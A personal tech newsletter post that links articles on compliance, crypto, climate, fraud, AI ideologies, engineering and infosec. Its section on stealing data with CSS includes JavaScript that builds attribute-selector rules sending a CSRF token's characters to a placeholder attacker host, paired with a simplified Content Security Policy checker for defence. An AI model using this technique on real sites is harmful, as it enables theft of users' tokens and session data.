
2023.09.01

You don’t have to read it, but you just might learn something.

Leading Thought

Quote from Denzel Washington: Some people will never like you because your spirit irritates their demons.


Prime

Compliance & Regulatory Standards Are Not Incompatible with Modern Development Best Practices

I’ve been arguing this for a long time, though not as eloquently as Charity Majors in this Twitter thread about a presentation she did recently in Austin, TX. If you are in an environment with regulatory standards (e.g., SOX) and you think that means you can’t have nice things (no gated check-ins, no mandatory two-reviewer rule in GitHub, and so on) “because compliance,” then this thread is a must-read.

As Charity points out, most of these regulations boil down to one thing: have a process, follow it, and be able to prove you followed it, so that you can show you are protecting your codebase from bad actors and protecting your customers. It’s probably obvious why, but most of these regulations are not prescriptive (or at least not at any significant level of detail): it would be near-impossible to dictate standards across vast swaths of varying industries.

Most of the pain we suffer comes from our organization’s interpretation of these regulations, and much of it is self-inflicted. Why? Because engineering is rarely involved in the discussions about how to meet the standards. The reasons vary, from siloed groups making these decisions to an aversion to getting involved in compliance at all. The reality is that we can have nice things, tighten up the feedback loops, and do better, all while complying with regulations that I think most people agree are good guard rails.

If you’re thinking about it from a finance perspective, it makes TOTAL SENSE to have all these audit logs, or for a supervisor to manually sign off at every stage. That’s how you build accountability into the system.

The way you build accountability into software is different.

The way you build accountability into software is by designing it into the architecture of your CI/CD pipeline, and pairing on code reviews.

It’s in your checksums, your fingerprints, your static application security testing… your auditable, replayable software pipeline.

‘The Wallet Event’: Crypto Startup Bankrupt After Losing Password to $38.9 Million Physical Crypto Wallet

Imagine you’re an individual with a crypto wallet and you lose access to a lot of money. That’s pretty terrible, but you have (hopefully) damaged only your own finances. Now imagine putting your money with a company that then loses access and impacts a lot of people, including its own employees, forcing it into bankruptcy. And, to top it off, it has also been robbing Peter to pay Paul rather than come clean about the problem.

While this story may be unusual for a company, the number of individuals who have lost their money by tossing a hard drive, tossing a thumb drive, or simply being unable to remember a passcode should make everyone stop and think twice about the value of decentralized money. The things that make it attractive to some (especially criminals) also make it an extreme risk. Say what you want about a traditional bank holding nation-backed currency, but you don’t generally hear a story about someone losing their PIN and never being able to access their account again.

A large problem, among more run-of-the-mill crypto economy problems such as “lack of operational and spending oversight” and “regulatory issues,” is the fact that it lost access to a physical wallet it was keeping tens of millions of dollars in, and cannot get back into it.

Looking for a US ‘climate haven’ away from heat and disaster risks? Good luck finding one

Whether or not you believe in climate change, this is an interesting article, not so much about what the change may look like as about the ability of so-called havens to handle it. From roads that buckle because they weren’t built with rising temperatures in mind, to storm and water infrastructure that can’t support increasing storm intensity, there are a lot of aspects most people probably aren’t considering.

While there are places that may fare better (older cities in the north that have seen their populations diminish), no one will go untouched. From more intense storms in the upper Midwest, to heavier snowfall and the floods that follow from snowmelt, the challenges are many and readiness is spotty at best. Definitely worth a read to add more information to your arsenal and prepare as you see fit.

There are a number of innovative ways that cities can fund infrastructure projects, such as public-private partnerships and green banks that help support sustainability projects. DC Green Bank in Washington, D.C., for example, works with private companies to mobilize funding for natural stormwater management projects and energy efficiency.

Tobacco Country’s Dirtiest Open Secret

If you ever need a good example of the unintended side effects of trying to do something good, and of motivating people to do wrong, this is one. Apparently there is a well-known practice in farming (not just tobacco) whereby farmers deliberately underplant, under-maintain, or simply don’t plant a crop at all, in order to file an insurance claim. Because the insurance is both subsidized and backed by the federal government, there is a belief that it really isn’t harming anyone.

But, of course, this doesn’t happen in a vacuum. Like any well-run scam, there are actors collaborating at every level, consciously or not: the insurers, the adjusters, and the companies that buy crops like tobacco for a song. While there are theoretical controls in place, such as adjusters not being able to work for the insurance companies, the reality is that many of the players come from the same areas and have known each other for years (say, from having gone to school together), and they rely on those relationships for collusion.

Definitely worth a read.

For those reasons, it’s Henton’s belief that the responsibility isn’t with any individual component of the crop insurance scam, but rather a symptom of the whole machine. “The entire thing needs to be shaken to the core,” he says. “There’s lots of players in this thing. And when you get to pointing — whose fault is it, who’s going to fix it? — you find yourself pointing in 15 different directions at once.”



Coming Soon

C# Corner Annual Conference 2023

(October 09-14 | Delhi NCR)

While this conference is in India (I’m not sure whether there will be a virtual option), I wanted to bring attention to it because this kid I used to work with, Joe Guadagno, will be speaking. If you are a C# dev and are going to be in India, or know a C# dev in India, give this a look. If a virtual option comes up, I’ll update the link.

KubeCon + CloudNativeCon North America 2023

(November 6 – 9 | Chicago, IL and Virtual)

If Cloud, Open Source, and Kubernetes are your thing, then this is a con for you. If you attend, keep an eye out for David Giard, a wonderful individual!



Humble Bundles

Microsoft Press Exam Ref Certification MEGA Book Bundle

New offering from Humble Bundle benefitting Women Who Code – and, if you don’t know it’s there, there is an Adjust Donation button that will let you give more of the take to charity! For a minimum donation of $25 you get 20 titles, including:

  • Exam Ref SC-100 Microsoft Cybersecurity Architect
  • Exam Ref AZ-900 Microsoft Azure Fundamentals 3rd Edition
  • Exam Ref AZ-500 Microsoft Azure Security Technologies 2nd Edition
  • Exam Ref SC-900 Microsoft Security, Compliance, and Identity Fundamentals
  • Exam Ref SC-200 Microsoft Security Operations Analyst
  • And more!

Machine Learning and AI 2023 Book Bundle

New offering from Humble Bundle benefitting Direct Relief – and, if you don’t know it’s there, there is an Adjust Donation button that will let you give more of the take to charity! For a minimum donation of $18 you get 25 titles, including:

  • Machine Learning Security Principles
  • Artificial Intelligence with Python - Second Edition
  • Machine Learning in Microservices
  • Creators of Intelligence
  • Applied Machine Learning and High-Performance Computing on AWS
  • And more!

Game Coding 2023

New offering from Humble Bundle benefitting Direct Relief – and, if you don’t know it’s there, there is an Adjust Donation button that will let you give more of the take to charity! For a minimum donation of $18 you get 19 titles, including:

  • How to Make a Game
  • GameMaker Fundamentals
  • Build Your Own 2D Game Engine and Create Great Web Games
  • Exploring Game Mechanics
  • Building Multiplayer Games in Unity
  • And more!

Project Managers Toolkit Software Bundle

New offering from Humble Bundle benefitting Alzheimer’s Research UK – and, if you don’t know it’s there, there is an Adjust Donation button that will let you give more of the take to charity! For a minimum donation of $25 you get 30 Pluralsight courses, including:

  • Product Management Crash Course and Trello Fundamentals
  • Kanban for Software Project Management
  • Agile Retrospective: Continuous Improvement and Kaizen with Scrum
  • Lean Management: Just-In-Time Training and Certification
  • The Complete Project Management Fundamentals Course
  • And more!



AI

‘Before It’s Too Late, Buddy’

If there were such a number, what would be the right number of people to sacrifice for a better future for humanity as a whole? The mere fact that a serious answer of around 8 billion (most of the population) has been given should make the TESCREAL movement worth watching. In a past issue, I linked an article about the various subgroups that make up TESCREAL (transhumanism, extropianism, singularitarianism, cosmism, rationalism, effective altruism and longtermism) and the extreme views they hold in the name of humanity spreading throughout the universe in the distant future; this article is a warning about how dangerous they could actually be.

A normal cult could simply be dismissed because cults, by their very nature, are usually small groups. But what happens when that small group is made up of some of the richest and most powerful people in the world, those who have the money and influence to potentially bring some of their vision to life? This is the danger of TESCREAL. No matter which side of the AI/AGI camp you fall into, this is worth a read to understand the threat posed by a handful of extremist thinkers who would willingly sacrifice most of humanity if it meant the merest chance that we might someday populate the universe.

The threats that I’ve received, the worries expressed by Knutsson, and the fact that TESCREALists themselves feel the need to hide their identities further bolsters my claim that this movement is dangerous. It operates like a cult, has “charismatic” leaders like Yudkowsky and Bostrom, and appears to be increasingly at ease with extreme rhetoric about how to stop the AGI apocalypse.



DE&I

The Micropedia

Important project here to catalog and raise awareness about microaggressions. In addition to providing examples across different groups (e.g., age, race, gender), there are tips on how to avoid microaggressions, how to respond to them, and how to be accountable for microaggressions you may have committed.

Take a moment to breathe. Everyone has caused a microaggression at some point and it’s never an easy situation.

  • Don’t ignore what’s happened
  • Listen to what the person you’ve hurt has to say
  • Offer a genuine apology without making excuses



Engineering

Structured ASP.NET Localization

Nice overview, with example code, of how to achieve localization in an ASP.NET app. The author includes examples of resource files and dependency injection, as well as a link to a GitHub repo with the sample code. If you need to provide your site in multiple languages, this may help kickstart your dev.

Array<T> vs T[]: Which is better?

Nice write-up about the two ways to declare array types in TypeScript. Maybe you think they are completely equal (spoiler: they are almost equal). Maybe you don’t really care which form is used. The big takeaway is to pick one and stick with it: a linter can enforce this, and your future self will thank you for being consistent.



Infosec

Stealing Data With CSS: Attack and Defense

As I dive deeper into modern front-end, I came across this article about data exfiltration via CSS, which I don’t think I would ever have considered a vulnerability. The article includes proof-of-concept code for exfiltrating data with CSS alone (no JavaScript needed), as well as how to mitigate the attack. Definitely worth a read if this isn’t already on your radar, since knowledge is power.

The best defense for website operators is to use a Content Security Policy (CSP) as part of your configuration. Fixing code injection flaws and using a Web Application Firewall can help, but there are still classes of CSS Exfil attacks that may still be effective against your website and which are outside an operator’s direct control (like malicious browser extensions or code injection through advertisements). By adding a CSP, it will limit the ability for an attacker to make calls to the remote URLs used to siphon data or include a rogue CSS document.
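To make the attack and the defense concrete, here is an added example written for this post (not the article’s proof-of-concept code, and not a real CSP engine). The first part generates the attribute-selector rules that CSS exfiltration relies on, one per candidate character, so that exactly one background image is fetched and the attacker learns a character of a secret attribute; the second part is a deliberately small CSP matcher used to show which policies stop those fetches. The `app.example` and `attacker.example` origins, the `csrf` input and the token value are constructed placeholders.

```javascript
// Added example: not code from this post or from the linked article. Part 1
// builds the attribute-selector rules that CSS exfiltration relies on; part 2
// is a deliberately small CSP matcher (not a full CSP implementation) used
// to show which policies stop those rules from loading anything. The
// attacker and page origins are placeholders.

// Part 1: one rule per candidate next character of a secret attribute.
// Only the rule whose [value^="..."] matches the real value applies, so the
// browser fetches exactly one background image, leaking that prefix.
function exfilRulesForPrefix(attrName, knownPrefix, charset, exfilOrigin) {
  return charset.split('').map((ch) => {
    const prefix = knownPrefix + ch;
    const leak = `${exfilOrigin}/leak?p=${encodeURIComponent(prefix)}`;
    return `input[name="${attrName}"][value^="${prefix}"]{background-image:url(${leak})}`;
  });
}

// Which prefix the attacker learns from a page whose input holds `attrValue`
// (a stand-in for the browser applying the rules above). The attacker repeats
// with the longer prefix until the whole value is known.
function leakedPrefix(attrValue, knownPrefix, charset) {
  const candidates = charset.split('').map((ch) => knownPrefix + ch);
  return candidates.find((p) => attrValue.startsWith(p)) ?? null;
}

// Part 2: parse "directive src src; directive src" into a map.
function parseCsp(header) {
  const policy = {};
  for (const part of header.split(';')) {
    const [name, ...sources] = part.trim().split(/\s+/).filter(Boolean);
    if (name) policy[name.toLowerCase()] = sources;
  }
  return policy;
}

// May `url` be loaded for `directive` on a page at `pageOrigin`? Supports
// 'none', 'self', '*' and scheme://host sources (with a leading "*."
// wildcard), falling back to default-src; scheme-less host sources are
// assumed to mean https. Real CSP has more source kinds than this.
function cspAllows(header, directive, url, pageOrigin) {
  const policy = parseCsp(header);
  const sources = policy[directive] ?? policy['default-src'];
  if (!sources) return true; // nothing governs this fetch
  const target = new URL(url);
  return sources.some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return target.origin === pageOrigin;
    if (src === '*') return true;
    const [scheme, host] = (src.includes('://') ? src : `https://${src}`).split('://');
    if (`${scheme}:` !== target.protocol) return false;
    return host.startsWith('*.') ? target.hostname.endsWith(host.slice(1)) : target.hostname === host;
  });
}

// Constructed sample: a CSRF token in a hidden input, hex charset.
const page = 'https://app.example';
const attacker = 'https://attacker.example';
const hex = '0123456789abcdef';
const token = '9f3a'; // the value the attacker is after (constructed)
let known = '';
for (let i = 0; i < token.length; i++) {
  const next = leakedPrefix(token, known, hex);
  if (next === null) break;
  known = next;
}
console.log('recovered:', known); // 9f3a
console.log(exfilRulesForPrefix('csrf', '9f', hex, attacker)[3]);

// The leak URL each rule points at, checked against three policies.
const leakUrl = `${attacker}/leak?p=9f3`;
console.log(cspAllows("default-src 'self'; img-src 'self'", 'img-src', leakUrl, page)); // false
console.log(cspAllows("default-src 'self'; img-src *", 'img-src', leakUrl, page)); // true
console.log(cspAllows("default-src 'self' https://*.example", 'img-src', leakUrl, page)); // true
```

Two practical points fall out of this. The selector matches the HTML `value` attribute, so the attack targets values the server renders into the markup (hidden CSRF tokens are the classic case), not text a user types. And the third policy shows that a CSP is only as good as its source list: a broad wildcard that happens to cover the attacker’s host does nothing, while `img-src 'self'` (or a tight allow-list) blocks the fetch that carries the data out.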

US tech firms offer data protections for Europeans to comply with EU big tech rules

Once again, Europe is leading the way in protecting its citizens from harmful practices used by big tech/social media companies like Facebook, TikTok and Twitter (I still can’t bring myself to call it anything else). The new rules hold companies liable for promoting hate speech and for using deceptive patterns, require them to open up how their algorithms work, and prevent targeted ads based on a user’s sensitive data.

While it would be nice to see tech companies bring the changes that meet the most stringent rules to everyone, the reality is that most live and die by advertising revenue and are therefore motivated to comply only where required. Given the current state of the US government, it is hard to imagine we could be anywhere close to mandating these kinds of protections.

The changes come in stark contrast to unsuccessful legislative pushes in the U.S. to ban tech companies from using sensitive and children’s data for targeted advertising.



This post is licensed under CC BY 4.0 by the author.